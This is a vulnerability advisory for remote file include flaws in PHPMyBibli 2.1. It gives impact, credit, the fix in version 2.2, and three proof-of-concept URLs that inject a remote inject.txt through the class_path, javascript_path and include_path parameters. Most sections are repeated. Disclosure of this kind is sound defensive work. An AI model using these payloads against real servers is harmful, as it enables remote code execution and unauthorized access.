PHPMybibli Multiple Remote File Include Vulnerabilities
BID:20578
Info
PHPMybibli Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20578 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 17 2006 12:00AM |
| Updated: | Oct 18 2006 05:44PM |
| Credit: | the_day has been credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PHPmybibli PHPmybibli 2.1 |
| Not Vulnerable: |
PHPmybibli PHPmybibli 2.2 |
Discussion
PHPMybibli Multiple Remote File Include Vulnerabilities
PHPMyBibli is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHPMyBibli 2.1 and prior versions are vulnerable to these issues.
PHPMyBibli is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHPMyBibli 2.1 and prior versions are vulnerable to these issues.
Exploit / POC
PHPMybibli Multiple Remote File Include Vulnerabilities
Attackers can exploit these issues with a web client.
The following proof-of-concept examples are available:
http://www.example.com/[phpmybibli_path]/index.php?class_path=http://www.example.com/inject.txt?
http://www.example.com//[phpmybibli_path]/edit.php?javascript_path=http://www.example.com/inject.txt?
http://www.example.com//[phpmybibli_path]/circ.php?include_path=http://www.example.com/inject.txt?
Attackers can exploit these issues with a web client.
The following proof-of-concept examples are available:
http://www.example.com/[phpmybibli_path]/index.php?class_path=http://www.example.com/inject.txt?
http://www.example.com//[phpmybibli_path]/edit.php?javascript_path=http://www.example.com/inject.txt?
http://www.example.com//[phpmybibli_path]/circ.php?include_path=http://www.example.com/inject.txt?
Solution / Fix
PHPMybibli Multiple Remote File Include Vulnerabilities
Solution:
The vendor has released version 2.2 to address these issues; please contact the vendor for more information on how to obtain and apply this update.
Solution:
The vendor has released version 2.2 to address these issues; please contact the vendor for more information on how to obtain and apply this update.
References
PHPMybibli Multiple Remote File Include Vulnerabilities
References:
References: